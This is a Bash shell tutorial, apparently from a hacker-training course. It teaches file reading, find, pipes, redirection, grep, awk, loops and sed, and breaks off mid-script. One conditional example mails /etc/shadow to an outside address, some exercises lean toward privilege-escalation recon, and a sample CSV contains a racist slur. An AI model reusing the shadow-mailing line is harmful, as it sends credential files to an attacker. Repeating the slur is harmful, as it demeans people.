
Bash book


The Bash Shell - Simple usage

Savitri says
This book was first published in PDF form for the registered students of the Black Hat Academy. We are now releasing it free of charge on this platform for everyone's benefit, as we work on new versions. I hope you'll like it. Don't hesitate to comment or to contribute in IRC.

Before we dive

Bash is an acronym for the Bourne Again Shell. An obvious pun on born-again Christians, bash is GNU/Linux's de facto standard shell. Its syntax is very close to that of the Korn shell, another widespread Unix shell. You may never have encountered such terms, though, so let's start with some definitions. A shell, in this context, is a command-line shell, that is, an interface that stands between a user and an operating system, enabling interaction between them. Unlike the standard Windows graphical shell, however, every interaction goes through text commands.

A typical bash session could look like

 
sav@phiber ~ $ ls
l2  los
sav@phiber ~ $ vim .qmail
sav@phiber ~ $ irssi
sav@phiber ~ $ exit
 

The keyboard inputs are what's between the $ and the end of line. ls stands for “list” (as in “list files”), vim is a text editor, irssi is an IRC client, exit, well, exits the shell.

Bash can be used in two modes, interactive and non-interactive. In interactive mode, users input commands and these are executed as the user issues them. In non-interactive mode, programmers write programs and then call them with parameters. The program runs, gets its input from somewhere else, be it a file, keyboard input, or another program, performs its operations, and exits.
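
For instance, here is a minimal sketch of non-interactive use (the /tmp/list.sh path is just an arbitrary name chosen for this illustration):

 
sav@phiber ~ $ bash -c 'ls'              # run a single command in a fresh, non-interactive shell
l2  los
sav@phiber ~ $ echo 'ls' > /tmp/list.sh  # store the command in a script file...
sav@phiber ~ $ bash /tmp/list.sh         # ...and have a non-interactive shell execute it
l2  los
 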

Getting started

We won't get too deep into Unix/Linux programs and will try, as far as possible, to stick to shell commands. When that's not possible (for example when filtering output), we will use standard Unix programs. We will be performing basic operations, like reading a file, writing to a file, reading input from the standard input, and chaining programs together. This knowledge will make you proficient in using the Unix shell.

Reading a file

The Unix command for reading a file is “cat”. It takes as parameters the names of the files to display. For example:

 
sav@phiber ~ $ cat /etc/motd
┏━┃┃ ┃┛┏━ ┏━┛┏━┃ ┏━┛┏━┃┏━ ━┏┛┃ ┃┏━┃┏━┛┃ ┃ ┃ ┃┏━┛
┏━┛┏━┃┃┏━┃┏━┛┏┏┛ ┃  ┏━┃┃ ┃ ┃ ┏━┃┏━┃┃  ┏┛  ┃ ┃━━┃
┛  ┛ ┛┛━━ ━━┛┛ ┛┛━━┛┛ ┛┛ ┛ ┛ ┛ ┛┛ ┛━━┛┛ ┛┛━━┛━━┛
 

(yes, it's ASCII art, I made it with toilet) will display the file /etc/motd (“Message of the Day”, a standard Unix file that is usually displayed at logon).

To read a long file, we will use the “less” command (or “more” if “less” is not available). more and less allow you to read through a file page by page, much like the DOS MORE command.

 
sav@phiber ~ $ more /proc/cpuinfo
 

To read the first lines of a file, we use “head”

 
sav@phiber ~ $ head -n 1 /etc/passwd
root:x:0:0:root:/root:/bin/bash
 

To read the last lines of a file, we use “tail”

 
sav@phiber ~ $ tail -n 2 /etc/passwd
randomx:x:1004:1004::/home/randomx:/bin/false
randomy:x:1005:1005::/home/randomy:/bin/false
 

These two examples read the file /etc/passwd, which contains details about the different accounts on the system. We'll go further on this later on.

To read a whole file, skipping the first lines, we still use “tail”

 
sav@phiber ~ $ cat test.csv
name,address,phone,e-mail
joe biden,12 drunkard st.,+1-234-8888,joe@biden.net
barack obama,1 nigga ave.,+1-234-1337,admin@gov.us
joe frazier,3 boxing bd.,+1-234-0101,joe@nottheother.com
sav@phiber ~ $ tail -n +2 test.csv
joe biden,12 drunkard st.,+1-234-8888,joe@biden.net
barack obama,1 nigga ave.,+1-234-1337,admin@gov.us
joe frazier,3 boxing bd.,+1-234-0101,joe@nottheother.com
 

These basic commands are essential once you're on a system; you will use them constantly.

Navigating and searching through the filesystem

During prehistory and antiquity there were no computers, so nobody cared much about computer filesystems. When the 60's and 70's came, mass random-access storage started to appear, and with it came the metaphor of files. Later on, folders came into the equation, when storage became big enough to hold significant amounts of data that needed to be sorted.

Most probably, if you're not an oldscene old-timer, you've always lived with files and folders (or directories, which are the same thing). Often you will need to search for files with a certain name, or with a certain name pattern, or which contain certain data. But let's do simple things first and navigate through the file system.

The Unix filesystem, for the scientifically minded, is a particular kind of graph we call a tree. That is, it is a non-looping graph (unless we resolve symbolic links, which can, if taken into account, turn any tree into a general graph). I suggest you search the net for Unix Tree / Linux Tree and look at Google Images. The Windows file system, on the other hand, is not a single tree but rather a set of trees, one for each “drive letter”.

To know where we are, we will use the pwd command. It stands for “print working directory”, that is, the directory in which we currently are.

 
sav@phiber ~ $ pwd
/home/sav
 

In order to navigate to other directories, we'll use the cd command.

 
sav@phiber ~ $ pwd
/home/sav
sav@phiber ~ $ cd ..
sav@phiber /home $ pwd
/home
sav@phiber /home $ cd /proc/self/
sav@phiber /proc/self $ pwd
/proc/self
sav@phiber /proc/self $ cd ../../tmp/
sav@phiber /tmp $ pwd
/tmp
 

A bit of explanation for all this. Historically in file systems, . stands for the current directory, while .. stands for the parent directory. So, basically, cd . does nothing, and cd .. navigates to the parent directory. These are what we call relative paths, that is, paths relative to the current position in the file system. On the other hand, cd /proc/self makes use of an absolute path, easily identified by its leading slash. cd /proc/self will always have the same outcome no matter what directory you are currently in.

cd ../../tmp/ is a longer relative path, which performs navigation two directory levels upwards, and then to the tmp directory.

Exercise: try to cd here and there, to existing directories and non-existing directories.

Searching for files and directories

There are two ways to search for files under Unix. The first one, find, walks through the file system from a given start node and searches under it. The second one, locate, maintains a database of existing files and searches through it, which is much quicker but requires regular maintenance.

Using find can be pretty awkward, especially for newcomers, so we'll explain a simplified version. Its first argument is the path you'll be searching in. Then, several command-line switches alter the behaviour of find. A complete guide can be found by typing “man find” into the console or into a Google search box.

In order to search for files whose name match a certain pattern, we will use the -name switch.

 
sav@phiber /tmp $ find /usr/share/ -name '*.sh'
/usr/share/git/contrib/fast-import/git-import.sh
/usr/share/git/contrib/ciabot/ciabot.sh
/usr/share/git/contrib/rerere-train.sh
/usr/share/git/contrib/remotes2config.sh
/usr/share/vim/vim73/macros/less.sh
 

searches for all files whose names match the '*.sh' pattern, that is, any file whose name ends with .sh. In order to search for all files belonging to user sav, we will use the -user switch

 
sav@phiber ~ $ find /home/sav/ -user sav
/home/sav/
/home/sav/l2
/home/sav/los
/home/sav/.ssh
/home/sav/.bashrc
/home/sav/.bash_logout
/home/sav/test.csv
/home/sav/.viminfo
 

There are many other possibilities; find is a very rich tool. Here comes an exercise.

Build the commands to:

  • Find all SUID bit binaries in /usr
  • Find all files belonging to user root in the /home directory.
  • Find all files modified less than a week ago (huge hint: this one can be “touch”y)
  • Find all executable files (not directories) in /usr/share
  • Find all .txt files, and all .h files, in the filesystem.

and provide us with output.

Using locate is much easier. First, from time to time, run the updatedb command as user root. Then type locate 'pattern' and you will be given a list of matching files.
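
For instance (a sketch: updatedb is shown with a hypothetical root prompt, and the matches will of course depend on your own system):

 
phiber ~ # updatedb
sav@phiber ~ $ locate 'less.sh'
/usr/share/vim/vim73/macros/less.sh
 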

Advanced find use

find is a power tool for any Unix administrator. Its ability to find files matching certain properties covers just about every need you'll ever have. With find you can chain conditions and negate them (see the sketch below). For example, try to build a command that finds all files created less than 7 days ago but more than 1 day ago (tip: start with touch -d “7 days ago” /tmp/marker)
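
As a small, hedged illustration of chaining and negating conditions (deliberately separate from the exercise above):

 
sav@phiber ~ $ find /usr/share/ -type f -name '*.sh' -user root   # chained conditions: regular file AND matching name AND owned by root
sav@phiber ~ $ find /usr/share/ -type f ! -name '*.sh'            # negation: regular files whose name does NOT end in .sh
 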

Combining find with xargs

Typically we will use find with the -print0 option (to get a NUL separator instead of whitespace or a newline) and xargs with the -0 option. This rules out all the whitespace and quotes-in-file-names issues. xargs can also be combined with the -L and -n options. An example:

 
find . -type f | xargs -n 30 md5sum
 

will pass md5sum 30 arguments at a time.
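
The same chain written with the NUL-separator options described above looks like this (a sketch; the behaviour is identical apart from the safe handling of odd file names):

 
find . -type f -print0 | xargs -0 -n 30 md5sum
 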

Executing several commands in a row

In order to execute several commands in a row, we usually put a semicolon (“;”) between the instructions. This executes the programs one after the other, no matter what their results are: if a program fails, the next one still runs. Example:

 
sav@phiber ~ $ head -n 1 /etc/shadow; head -n 1 /etc/passwd
head: cannot open '/etc/shadow' for reading: Permission denied
root:x:0:0:root:/root:/bin/bash
 

In some situations, for example when checking for dependencies with “configure” before building and installing a program, this kind of chaining is a misfit: we cannot proceed with the build or installation if the previous step has failed.

So, to go forward if and only if the programs succeed, we use the “&&” (AND) operator.

Example:

 
sav@phiber ~ $ head -n 1 /etc/shadow && head -n 1 /etc/passwd
head: cannot open '/etc/shadow' for reading: Permission denied
 

In other situations, we may want to execute a command only if another has failed. For this, we use the “||” (OR) operator

Example:

 
sav@phiber ~ $ head -n /etc/shadow || echo "Cannot read shadow file :( exploit haz failed :((((("
head: /etc/shadow: invalid number of lines
Cannot read shadow file :( exploit haz failed :(((((
 

Chaining programs

Sometimes we may want to take the output of a program and further refine it, for example when searching for a big number of files. In that case, we may want to be able to read the output of the find or locate command with the help of the less or more program.

In the Unix philosophy, basically everything is a file. Block devices, the keyboard, the sound card, RAM: everything really is a file. Every program has at least 1 input “file” (often wired to the terminal's input) and 2 output “files”, wired by default to two channels of the terminal as well. Each of these file descriptors is numbered from 0 to 2: 0 is the standard input (STDIN), 1 is the standard output (STDOUT) and 2 is the error channel (STDERR). When errors occur, they are normally, for standards-respecting programs, written on the error channel.

Many standard file-manipulation programs, when not given a file name, will take their input from STDIN. This allows, as you will have guessed, for seamless program chaining.

So, for the proposed example, try:

 
sav@phiber ~ $ find /etc/ -name '*.conf' | less
 

The | is a “pipe”. On QWERTY keyboards it sits on the rightmost part of the keyboard, next to the Enter/Return key. On Mac keyboards, it's typed using Apple+Alt+L. On other keyboards, check for yourself. You will need that symbol basically every second you spend typing in a Linux/Unix terminal.

Program chains can be virtually unlimited in length. Something like

 
sav@phiber ~ $ find /etc/ -name '*.conf' | tail -n 10 | head -n 2 | sort | uniq
 

with 5 programs in a chain is pretty common. Unix uses and abuses this, and so should you.

Writing to files

The output of any command can be redirected to a file using the right-pointing angle bracket sign. An example will make this explicit:

 
sav@phiber ~ $ head -n 4 /proc/cpuinfo > /tmp/test
sav@phiber ~ $ cat /tmp/test
processor       : 0
vendor_id       : GenuineIntel
cpu family      : 6
model           : 23
 

When using the simple right-pointing angle bracket without any option, the errors produced will not be stored in the target file. In order to log them, we need to redirect STDERR to STDOUT. For this, we use the 2>&1 instruction, which tells the shell to redirect channel 2 (STDERR) to channel 1 (&1, STDOUT). This way, the errors are written on the same channel as the standard messages and can thus be stored in a log file.

For example:

 
sav@phiber ~ $ find /etc/skel/ -name foo > /tmp/test
find: '/etc/skel/.ssh': Permission denied
find: '/etc/skel/.maildir': Permission denied
sav@phiber ~ $ cat /tmp/test
sav@phiber ~ $
 

and now:

 
sav@phiber ~ $ find /etc/skel/ -name foo > /tmp/test 2>&1
sav@phiber ~ $ cat /tmp/test
find: '/etc/skel/.ssh': Permission denied
find: '/etc/skel/.maildir': Permission denied
 

You should always specify file descriptor redirections AFTER any standard output file redirection. You may also want to log output to a file while keeping the standard display on the terminal. Chaining your program to tee will help you do so:

 
sav@phiber ~ $ find /etc/skel/ -name '*foo*' 2>&1 | tee  /tmp/log.txt
find: '/etc/skel/.ssh': Permission denied
find: '/etc/skel/.maildir': Permission denied
sav@phiber ~ $ cat /tmp/log.txt
find: '/etc/skel/.ssh': Permission denied
find: '/etc/skel/.maildir': Permission denied
 

As you can see, the output is both copied to stdout and written to the file passed as argument. Remember tee as a “golf tee” or T pipe, which takes one input and splits it into two flows, one to a file and one to stdout. tee can be used to keep “raw”, unfiltered data in files while not breaking the processing chain. We are done with the basic tools, and can now start to learn more advanced uses of the Unix/Linux shell, especially of bash.


Back on board

In this chapter, you have learned how to use the basic functionality of a common Unix shell. This knowledge applies primarily to bash but can be transferred to virtually any POSIX-standard shell. We tried to put real-world examples into this course, but the best examples will be reading and processing data you actually need. So practice, practice and practice. Soon we will move on to a more advanced level that will allow you to write more complete bash programs.

Advanced use, loops, stream editing, shell programs

Before we dive

In the previous lesson, we studied basic I/O with bash and a small set of Unix programs.

Advanced bash

Sorting and removing duplicates

When reading a file, we may want to sort it and remove duplicate lines. For this purpose we will be using two tools, often chained together: sort and uniq. sort will, well, sort its input using a given rule (numerically, in dictionary order, standard or reverse). All its options can be found in its user manual. Basic options are -n (sort numerically), -d (sort in dictionary order) and -r (reverse the output).

uniq will remove consecutive identical lines. Most often it will be used without any option, but it has a bunch of options that can make it useful for other purposes. man uniq will give you all the directions for using it.

Example: try

 
sav@phiber ~ $ cat /proc/cpuinfo | sort -d | uniq
 

and compare it to

 
sav@phiber ~ $ cat /proc/cpuinfo | sort -d 
 

and

 
sav@phiber ~ $ cat /proc/cpuinfo
 

Filtering output

Quite often, programs or files will contain data we need and data we don't need at all. In order to optimize our workflow, and more specifically when feeding programs into each other, it is very useful to keep only the data we need.

In order to filter, we will be using grep and its variants, mainly egrep.

 
sav@phiber ~ $ grep bogomips /proc/cpuinfo
bogomips        : 3200.47
bogomips        : 3200.30
bogomips        : 3198.95
bogomips        : 3200.50
 

This searches for the string “bogomips” in /proc/cpuinfo. Since our system is quad-core, we get 4 lines of output and nothing else. Compare to cat /proc/cpuinfo. If we need to search for more complex strings, we can use the power of regular expressions.

For example, we may want to keep only lines starting with a lowercase consonant, for obscure reasons.

Try this on your system:

 
sav@phiber ~ $ grep '^[bcdfghjklmnpqrstvzwx]' /proc/cpuinfo 
 

and compare the output to

 
sav@phiber ~ $ cat /proc/cpuinfo
 

Regular expressions are quite a large topic. We invite you to read some of the starters you will find on the Internet. Basically, the caret before the rest means “anything starting with”. The square brackets are class delimiters: everything inside them is part of a user-defined character class. Character classes can also be negated: we may define a class matching “anything but these characters”. Character ranges can be defined using a standard hyphen, and some implementations provide pre-defined character classes.
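
A quick, hedged illustration of these building blocks, reusing /proc/cpuinfo (output omitted, try them yourself):

 
sav@phiber ~ $ grep '^[aeiou]' /proc/cpuinfo             # lines starting with a lowercase vowel (a character class)
sav@phiber ~ $ grep '^[^a-z]' /proc/cpuinfo              # negated class: lines NOT starting with a lowercase letter
sav@phiber ~ $ grep '[0-9][0-9]*\.[0-9]' /proc/cpuinfo   # a range plus an escaped literal dot: numbers with decimals
 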

Your best option, since this is a very wide topic, is to read basic tutorials on the Internet and start from there. In general, when searching for common data (grepping e-mail addresses or phone numbers), a ready-made regular expression (or “regexp” / “regex”) will be available.

grep output can be inverted, so that only non-matching lines are displayed. This is useful for filtering garbage out. A typical example is grep -v '^$', which removes empty lines, or grep -v '^#', which removes comment lines starting with a #.

Like all standard Unix programs, when not given a file name, grep takes its data from the standard input.

grep and variants have a big limitation: only whole lines can be displayed.

Displaying only part of lines

grep does part of the filtering job, but on its own it is quite often insufficient. Indeed, if we only need one part of a line, or don't need some parts, grep can't do anything for us.

That's where the basic utility cut and the power tool and inline programming language awk come into action.

cut takes two parameters, a delimiter and a field number. It splits each line of its input using the given delimiter and displays the 1-indexed field it was given as parameter.

Example: display shells in use in the system

 
sav@phiber ~ $ grep -v /bin/false  /etc/passwd | cut -d: -f7 | sort |uniq
/bin/bash
/bin/sync
/sbin/halt
/sbin/nologin
/sbin/shutdown
 

compare to

 
sav@phiber ~ $ cat /etc/passwd
 

But what if we want to display two fields? With cut, this is simply not possible. So, for this purpose, we will be using a bigger, more powerful tool: awk. Awk includes grep-like regexps, character-based field separation, and formatted output. When using it we have two options:

  • Give it grep-prepared input and use it only as a formatter
  • Use it alone, leveraging more of its power.

Awk will usually take the -F argument when the delimiter is not whitespace. Typically, for colon-separated values, -F: will be used. Notice there's no space between the F and the colon.

Let's say we want to display user names and shells of all accounts residing in /home. Compare the output of these two commands

 
sav@phiber ~ $ grep '/home' /etc/passwd | awk -F: '{ print $1" "$7}'
hatter /bin/bash
sav /bin/bash
xochipilli /bin/bash
sav@phiber ~ $ awk -F: '/\/home/ { print $1" "$7}' /etc/passwd
hatter /bin/bash
sav /bin/bash
xochipilli /bin/bash
 

The slash just before home is preceded by a backslash. This practice is called “escaping”, and it makes awk interpret the slash as a literal character rather than as the regular expression delimiter.

Awk works using code blocks. Code blocks are delimited by curly brackets and are executed if the optional match condition placed before them is true. In our first example there is no condition, so all lines are processed; this is fine because we perform the filtering with grep first. In our second example, the condition is the validation of the regular expression /home (regular expressions are, in standard awk, delimited by slashes), that is, any line containing /home.

Comparing the two examples, we might think that the awk regex method is more complex and could be avoided. However, when it comes to more complex processing, the grep approach falls short.

Let's say we want to display usernames for /home-based users and display an alarm for users whose home directory is under the /var filesystem. Using grep as a filter, we would have a hard time performing the task, having to read the input twice and build two different awk filters. With an awk one-liner, this is much clearer and we have more formatting options.

Test this:

 
sav@phiber ~ $ awk -F: '/\/home/ { print "user: "$1} /\/var/ { print "Hmm, "$1" is located in /var"}' /etc/passwd
 

However, this example is still not perfect. We'd like to refine our output and display the alert only if the /var-based user's shell is not /sbin/nologin (that is, the account is potentially a usable account):

 
awk -F: '/\/home/ { print "user: "$1} (/\/var/ && $7!="/sbin/nologin") { print "Hmm, "$1" is located in /var"}' /etc/passwd
 

The && is a logical AND condition, that is, the expression validates if and only if both conditions in the parentheses are true.

Statistics on the output

We will not be diving into complex statistics on the output. Usually, we just want to know how many lines there are in the output, to give us an idea of the order of magnitude of processing time we will need after getting our data. The wc (as in word count) tool is the way to go for this.

Chaining | wc at the end of a program suppresses its normal output and instead gives us statistics about the number of lines, words and characters in the data it received. For complete information about wc, feel free to check its manual (man wc).

 
sav@phiber ~ $ awk -F: '/\/home/ { print "user: "$1} (/\/var/ && $7!="/sbin/nologin") { print "Hmm, "$1" is located in /var"}' /etc/passwd | wc
     13      50     267
 

This is not very refined. In order to get only the number of lines, we could pipe wc's output through awk and print just the first field, but that would be bloated. Rather, we will use wc's command-line switches.

  • Piping wc -c will count the number of characters.
  • Piping wc -w will count the number of words
  • Piping wc -l will count the number of lines

Most often, the number of lines will be what interests us. So, refined example:

 
sav@phiber ~ $ awk -F: '/\/home/ { print "user: "$1} (/\/var/ && $7!="/sbin/nologin") { print "Hmm, "$1" is located in /var"}' /etc/passwd | wc -l
13
 

The output is much cleaner.

Variables, loops and conditional statements

Bash has three kinds of loops. The while loop takes a condition as parameter and continues executing until the condition becomes false. The for loop, on the other hand, takes a series of inputs and does its work for every member of the series. As for the data range, it is quite particular in that it can only hold a single expression, and is in general a stub used to feed the other loops.

Conditional statements in bash make use of the test built-in utility. man test gives us many indications of the different boolean tests it is possible to perform. We will demonstrate its use with a few examples. This part of the chapter will also be the occasion to get in touch with the $() operator. As for variables, they store data in buffers (temporary memory) for later use, in the form of strings.

Variables

Two basic operations are possible on variables: assigning them and reading them. Assigning means “storing a value in a variable”. Reading is retrieving the contents of the variable.

A variable has a name and a value. Usually in bash, explicit (user-declared) variables have UPPERCASE identifiers. The variable access operator is ${}, often shortened to $. When ${} is not explicitly needed, that is, when the variable's value does not have to be stuck directly to other data, we prefer the $ operator. When there must be absolutely no ambiguity in an ambiguous context, we use the full ${} syntax.

All this may sound quite abstract but an example will make it all explicit:

 
sav@phiber ~ $ MY_NAME="Savitri"
sav@phiber ~ $ MY_MAIL="sav@canthack.us"
sav@phiber ~ $ echo "Hello, my name is ${MY_NAME} and my e-mail address is ${MY_MAIL}"
Hello, my name is Savitri and my e-mail address is sav@canthack.us
sav@phiber ~ $ echo "Hello, my name is $MY_NAME and my e-mail address is $MY_MAIL"
Hello, my name is Savitri and my e-mail address is sav@canthack.us
 
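
The difference between the two forms shows up when the variable is immediately followed by characters that could be read as part of its name. A minimal sketch (the FILE variable is made up for this illustration):

 
sav@phiber ~ $ FILE="report"
sav@phiber ~ $ echo "$FILE_old"      # bash looks for a variable named FILE_old, which is unset

sav@phiber ~ $ echo "${FILE}_old"    # the braces make the variable name unambiguous
report_old
 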

Variables can store numeric values, and it is possible to perform basic integer arithmetic using the $(()) operator. Don't confuse this operator with $()

Example (the very classical and academic linear implementation of the Fibonacci sequence):

 
sav@phiber ~ $ FIB1=1; FIB2=1; B=$FIB1; FIB1=$FIB2; FIB2=$(($B+$FIB1)); echo $FIB2;
2
sav@phiber ~ $ B=$FIB1; FIB1=$FIB2; FIB2=$(($B+$FIB1)); echo $FIB2;
3
sav@phiber ~ $ B=$FIB1; FIB1=$FIB2; FIB2=$(($B+$FIB1)); echo $FIB2;
5
sav@phiber ~ $ B=$FIB1; FIB1=$FIB2; FIB2=$(($B+$FIB1)); echo $FIB2;
8
sav@phiber ~ $ B=$FIB1; FIB1=$FIB2; FIB2=$(($B+$FIB1)); echo $FIB2;
13
sav@phiber ~ $ B=$FIB1; FIB1=$FIB2; FIB2=$(($B+$FIB1)); echo $FIB2;
21
 

Remember, the Fibonacci sequence is defined by F(n) = F(n-1) + F(n-2), with F(0) = 1 and F(1) = 1. We can also assign the output of programs to variables. For this, we make use of the $() operator.

 
sav@phiber ~ $ SAV_LINE=$(grep /home/sav /etc/passwd)
sav@phiber ~ $ echo "Sav's line is: $SAV_LINE"
Sav's line is: sav:x:1024:1024::/home/sav:/bin/bash

This allows for storage of filtered output for further use. Often we will store in a variable the output of a chain of programs trailed by a wc -l, which will be either zero or non-zero.
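
A minimal sketch of that pattern (the variable name NB_BASH_USERS is arbitrary, and the count obviously depends on your system):

 
sav@phiber ~ $ NB_BASH_USERS=$(grep /bin/bash /etc/passwd | wc -l)
sav@phiber ~ $ echo "Accounts using bash: $NB_BASH_USERS"
Accounts using bash: 4
 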

Variables can be set programmatically or filled from standard input. In order to read data from the user, we use the read utility.

Try this example:

 
sav@phiber ~ $ echo -n "What's your name?> "; \
read name; echo -n "How old are you?> "; read age; \
echo -n "Where d'ya go to school?> "; read school; \
echo "Ok, $name. You're $age and go to $school. Now that we know each other just a little bit better,\
why won't you come over here, and make me feel all right?"
 

User input is stored in variables name, age, and school. They are later accessed and displayed in a glorious fashion, using the $ operator.

Conditional statements

Conditional statements allow us to write sub-programs that execute only if certain conditions are met. The conditions are tested: if they validate, a block of code is executed; optionally, if they don't validate, another block of code is executed instead.

The tests can be equality tests, greater-than/less-than comparisons, emptiness or non-emptiness tests, and file existence and file “type” tests. All tests are listed in “man test”.

Before we see some examples, let's introduce the $() operator. It captures the output of the command line given inside the parentheses, and returns it as a string, which can be used, for example, for testing.

For example, we can test whether a program outputs more than 5 lines, display “more than 5” if there are more than 5 lines, and “less than or exactly 5” otherwise.

 
sav@phiber ~ $ if [ $(grep bash /etc/passwd | wc -l) -gt 5 ]; then echo "more than 5"; else echo "less than or exactly 5"; fi
more than 5
 

It's important to put spaces between the values and the square brackets when testing. The general syntax for conditional statements is:

 
if [ conditions ]; then block_of_code_true; else block_of_code_false; fi
 

Reminder: blocks of code are instructions separated by semicolons or other program chaining operators (|, &&, ||).

As for implementation, the test program, called implicitly when using the square brackets, has a success exit status when the test validates, and a failure exit status otherwise. This can be useful when testing success of programs.

Unix provides us with two near-standard utilities: true and false. true simply returns EXIT_SUCCESS (0) and false returns EXIT_FAILURE (1 or more, depending on system). This allows for demonstrative constructs like:

 
sav@scorpion ~ $ if true; then echo hello; else echo goodbye; fi;
hello
sav@scorpion ~ $ if false; then echo hello; else echo goodbye; fi;
goodbye
 

or more realistic error handling:

 
sav@scorpion ~ $ if cat /etc/shadow; then echo "Victory"; cat /etc/shadow | mail -s "Shadow" exploit@yay.us; else echo "Failure :("; uname -a ; fi;
cat: /etc/shadow: Permission denied
Failure :(
Linux hardcore 2.6.42-hardened #3 SMP Mon Jun 27 17:54:00 GMT 2011 i686 Intel(R) Phenom(R) CPU A6608@ 8.00GHz FakeIntel GNU/Linux
 

Data ranges

Bash has shorthands for the most common ASCII- or number-based data ranges. Data ranges are delimited by curly brackets and take the form {start..end}. They can be ascending or descending.

Examples:

 
sav@phiber ~ $ echo {z..a}
z y x w v u t s r q p o n m l k j i h g f e d c b a
sav@phiber ~ $ echo {1..88}mph
1mph 2mph 3mph 4mph [...] 83mph 84mph 85mph 86mph 87mph 88mph
 

If there are spaces between the range and the following or preceding text, they need to be backslash-escaped, as in:

 
sav@phiber ~ $ echo Lets\ reach\ {1..88}\ mph
 

The for loop

The for loop is ideal for simple, word-based data processing. It takes a given input string, splits it into words (based on an environment-defined separator, IFS, the “Internal Field Separator”, blank space by default), and enumerates through these words.

A trivial example: list all CSV files in a directory, print a line for each one found, and display its first line.

 
sav@phiber ~ $ for i in *.csv; do echo "Found CSV:" $i; head -n 1 $i; done
Found CSV: test.csv
name,address,phone,e-mail
 

From this basic example, we can build more complex loops. We will quite often make use of the $() operator, which allows looping over the output of complex program chains. A complete example:

 
sav@phiber ~ $ for i in $(mount | awk '{print $3}' | sort | uniq); do echo "Mount point: $i"; du -x --max-depth=0 $i; done
 

Run this on your own installation. This enumerates through all mounted file systems and displays the global disk space usage on each of them. Try:

 
sav@phiber ~ $ mount | awk '{print $3}' | sort | uniq
 

then

 
sav@phiber ~ $ for i in $(mount | awk '{print $3}' | sort | uniq); do echo "Mount point: $i"; done
 

and then see our first example for the completed task.

We can sum up the syntax of the for loop, now:

 
for variable_name in list_of_values; do code_block; done
 

The for loop is the most used loop when it comes to data processing.

The while loop

The while loop, in contrast to the for loop, executes its inner block for as long as a condition (of the same kind as the ones met in the “if” conditional statements section) is true.

Typically, it will be used to wait for a condition to occur, or to repeatedly do something until a certain event occurs or the user interrupts the program.

With the while loop, the true utility becomes more useful. Indeed, since it is always true and very quick to execute, it's ideal for bash programs that run perpetually, for example a program that checks whether a network interface is connected and, if it isn't, lights lights and sounds alarms to request intervention from an administrator.
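
A minimal sketch of such a watchdog, assuming the interface is called eth0, that ip link reports “state UP” when it is connected, and with a simple echo standing in for the lights and alarms:

 
while true; do
    if ! ip link show eth0 | grep -q 'state UP'; then
        echo "ALARM: eth0 is down, please call an administrator!"
    fi
    sleep 10    # check again in ten seconds
done
 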

Let's now write an implementation of the Fibonacci sequence using the while loop.

 
sav@phiber ~ $ FIB1=1;\
FIB2=1;\
I=2;\
 while true; do B=$FIB1;
FIB1=$FIB2;
FIB2=$(($B+$FIB1));
echo "Fib(${I}) = $FIB2"; I=$(($I+1)); 
sleep 1; 
done;
Fib(2) = 2
Fib(3) = 3
Fib(4) = 5
Fib(5) = 8
Fib(6) = 13
Fib(7) = 21
Fib(8) = 34
[...]
 

In this example we introduce the “sleep” utility, that will wait for the given number of seconds before exiting and letting the program flow continue: very useful when generating a lot of human readable output.

This loop has no end; only interrupting the program with the ^C (Control+c) key combination will stop it.

We can also make use of “read” to feed our while loop. Indeed, when read is fed with no data, it will exit with a failure code, and thus the loop will stop. This makes the following example possible:

 
sav@phiber ~ $ I=1; cat /proc/cpuinfo | while read line; do echo -n "Line ${I}> "; echo $line; I=$(($I+1)); done
Line 1> processor : 0
Line 2> vendor_id : GenuineIntel
Line 3> cpu family : 6
Line 4> model : 23
Line 5> model name : Intel(R) Xeon(R) CPU E5405 @ 2.00GHz
Line 6> stepping : 6
Line 7> cpu MHz : 1599.832
[...]
Line 28> power management:
Line 29>
sav@scorpion ~ $
 

When the input runs out (EOT, End Of Transmission), read exits with a failure code, and the loop stops.

Stream editing

Until now, we have been handling data by reading it, storing it, and using tools like cut or awk to transform and format it. This method has the advantage of apparent simplicity, but can be problematic for two reasons.

First, its simplicity is only apparent. In order to process complex tasks, it is necessary to store intermediate results in buffer files or variables, making the programs messy.

Second, when it comes to raw performance, these operations mean spawning one or more programs for each line of input, causing a huge number of I/O operations. Stream editing is another approach to file processing. It transforms data on the fly, based on substitution patterns, and allows for lightning-fast edits on big files. Here is an example of loop editing versus stream editing; the “loops” example is a typical “you're doing it wrong”, while the stream editing example is concise and elegant.

Let's say we want to replace all occurrences of “hatter” by “sav” in a given file.

The awk wrong way (generated using clever metaprogramming, don't worry about my keyboard), assuming there are at most 5 words per line:

 
sav@phiber ~ $ awk -F: '($1 == "hatter") { print "sav "$2" "$3" "$4" "$5 ; next;}\
($2 == "hatter") { print $1" sav " "$3" "$4" "$5 ;next;}\
($3 == "hatter") { print $1" "$2" sav "$4" "$5;next; }\
($4 == "hatter") { print $1" "$2" "$3" sav "$5;next; }\
($5 == "hatter") { print "sav " "$2" "$3" "$4" sav";next; }\
{ print $0} ' /etc/passwd | grep sav
sav x 1000 1000
sav:x:1002:1002::/home/sav:/bin/bash
 

The stream editing method, concise and accurate:

 
sav@phiber ~ $ sed s/hatter/sav/g /etc/passwd | grep sav
sav:x:1000:1000::/home/sav:/bin/bash
sav:x:1002:1002::/home/sav:/bin/bash
 

Stream editing is used by most system administrators as a super power tool. It is able to transform data in place using the power of regular expressions. This allows for seamless editing of complex files that would otherwise take hours, whether done manually or by other means of programming. sed and grep, together with sort and uniq, are tools a system administrator needs on a daily basis. You, as a future advanced Unix user, will need them as well. We urge you to read more on regular expressions if you haven't already. They will be of constant use in your Unix life.
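
For genuinely in-place editing (modifying the file itself rather than printing the transformed stream), GNU sed offers the -i switch. A hedged sketch, working on a throw-away copy and keeping a .bak backup:

 
sav@phiber ~ $ cp /etc/passwd /tmp/passwd-copy
sav@phiber ~ $ sed -i.bak 's/hatter/sav/g' /tmp/passwd-copy
sav@phiber ~ $ grep sav /tmp/passwd-copy
sav:x:1000:1000::/home/sav:/bin/bash
sav:x:1002:1002::/home/sav:/bin/bash
 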

Writing programs in bash

All the programs we have written up to this point are one-liners, typed interactively in the shell. As you may have noticed, the power of bash and the shell tools is quite extensive. It is useful to store commonly-used code performing tasks we often have to execute. Such programs are stored in script files, that is, plain text files containing bash code.

Using script files, the readability of our code improves: indeed, we can add comments (starting with a # pound sign) to the code, break lines at the end of commands, and use indentation to mark code blocks visually. In addition, we can define sub-programs in the form of functions.

Now spawn a text editor of your choice to edit a gloria.sh file. Put these contents inside:

 
#!/bin/bash
# gloria.sh – Glorifies Jim Morrison
 
echo -n "What's your name?> "
read name
echo -n "How old are you?> "
read age
echo -n "Where d'ya go to school?> "
read school
